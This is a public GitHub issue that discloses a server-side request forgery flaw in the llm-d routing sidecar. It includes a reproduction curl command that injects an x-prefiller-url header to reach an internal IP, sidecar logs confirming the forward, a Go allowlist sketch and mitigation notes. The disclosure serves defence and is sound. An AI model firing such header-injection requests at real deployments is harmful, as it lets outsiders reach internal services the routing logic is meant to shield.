Potential SSRF via x-prefiller-url or x-prefiller-host-port header #242

@pierDipi

Disclaimer

Since the project is new and I have not found a documented responsible disclosure process (see https://llm-d.ai/docs/community/contribute#security), I'm creating a public issue, in the hope that most users are still only experimenting with llm-d and that their production setups are not affected.

Problem

There is a potential for Server-Side Request Forgery (SSRF).

The routing sidecar honors the x-prefiller-url and x-prefiller-host-port headers. However, I'd expect the scheduler or the Gateway (at least) not to pass these headers through when they come from external, user-provided requests.

This allows a malicious external user to craft a request that forces the sidecar to forward the prefill stage of the request to an arbitrary URL or host:port. This bypasses the intended routing logic managed by the scheduler.
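One possible direction, sketched under assumptions: the sidecar could refuse any prefiller target that is not in a set of known prefill endpoints. The helper name validatePrefillerTarget, the allowlist shape, and the address 10.244.0.20:8000 are hypothetical and are not taken from the llm-d code base; only the header value format (a URL such as http://10.244.0.51:8000) comes from this report.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
)

// validatePrefillerTarget is a hypothetical helper (not part of llm-d).
// It accepts the raw value of the x-prefiller-url header and returns the
// parsed URL only if its host:port is in the allowed set.
func validatePrefillerTarget(raw string, allowed map[string]struct{}) (*url.URL, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, fmt.Errorf("parse prefiller URL: %w", err)
	}
	// Only plain HTTP(S) targets make sense for a prefill request.
	if u.Scheme != "http" && u.Scheme != "https" {
		return nil, errors.New("prefiller URL must use http or https")
	}
	// Reject embedded credentials such as http://user:pass@host/.
	if u.User != nil {
		return nil, errors.New("prefiller URL must not carry credentials")
	}
	// u.Host includes the port when one is present, e.g. "10.244.0.51:8000".
	if _, ok := allowed[u.Host]; !ok {
		return nil, fmt.Errorf("prefiller host %q is not an allowed prefill endpoint", u.Host)
	}
	return u, nil
}

func main() {
	// Assumed allowlist: in a real deployment this would have to come from
	// the set of prefill pods the scheduler actually manages.
	allowed := map[string]struct{}{"10.244.0.20:8000": {}}

	for _, raw := range []string{"http://10.244.0.20:8000", "http://10.244.0.51:8000"} {
		if _, err := validatePrefillerTarget(raw, allowed); err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("accepted:", raw)
	}
}
```

How such an allowlist would be populated and kept in sync with the scheduler is an open question that this sketch does not answer.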

To Reproduce

  1. Deploy a model fronted by Gateway and the inference scheduler on a cluster (e.g., KinD).
  2. Send a POST request to the model's inference endpoint via the gateway.
  3. In the request, include the header x-prefiller-url pointing to an arbitrary internal service address.
  4. Observe that the request is successfully processed by the unintended service.

Example curl command

The following command was sent to the gateway at 172.18.0.3. It includes the x-prefiller-url header, which points to an arbitrary internal IP http://10.244.0.51:8000. The request succeeds with a 200 OK status, indicating the sidecar forwarded the request as instructed by the header.

curl -v -XPOST \
-H "x-prefiller-url: http://10.244.0.51:8000" \
-H "Content-Type: application/json" \
-d '{"model": "facebook/opt-125m", "prompt": "Write a poem about colors...", "stream": false, "max_tokens": 400}' \
http://172.18.0.3/default/facebook-opt-125m-pd/v1/completions

The sidecar then logs entries like these:

I0703 09:55:11.606604       1 chat_completions.go:310] "sending request to prefiller" logger="proxy server" url="http://10.244.0.51:8000/" body="{\"do_remote_decode\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"stream\":false}"
I0703 09:55:12.898331       1 chat_completions.go:334] "warning: missing 'remote_block_ids' field in prefiller response" logger="proxy server"
I0703 09:55:12.898347       1 chat_completions.go:340] "warning: missing 'remote_engine_id' field in prefiller response" logger="proxy server"
I0703 09:55:12.898351       1 chat_completions.go:346] "warning: missing 'remote_host' field in prefiller response" logger="proxy server"
I0703 09:55:12.898355       1 chat_completions.go:352] "warning: missing 'remote_port' field in prefiller response" logger="proxy server"
I0703 09:55:12.898361       1 chat_completions.go:355] "received prefiller response" logger="proxy server" remote_block_ids=null remote_engine_id=null remote_host=null remote_port=null
I0703 09:55:12.898389       1 chat_completions.go:393] "sending request to decoder" logger="proxy server" body="{\"do_remote_prefill\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"remote_block_ids\":null,\"remote_engine_id\":null,\"remote_host\":null,\"remote_port\":null,\"stream\":false}"

Notes

  • An egress network policy can mitigate the issue for both external and cluster-internal traffic. However, it is not simple to configure out of the box, because vLLM needs to connect to Hugging Face and other external hosts to download the model(s).
  • It is unclear whether an HTTPRoute filter that removes the header would mitigate the issue without breaking the P/D functionality, since filters are applied before the "action" (I'm not sure what that means in the context of InferencePool and ExtProc).
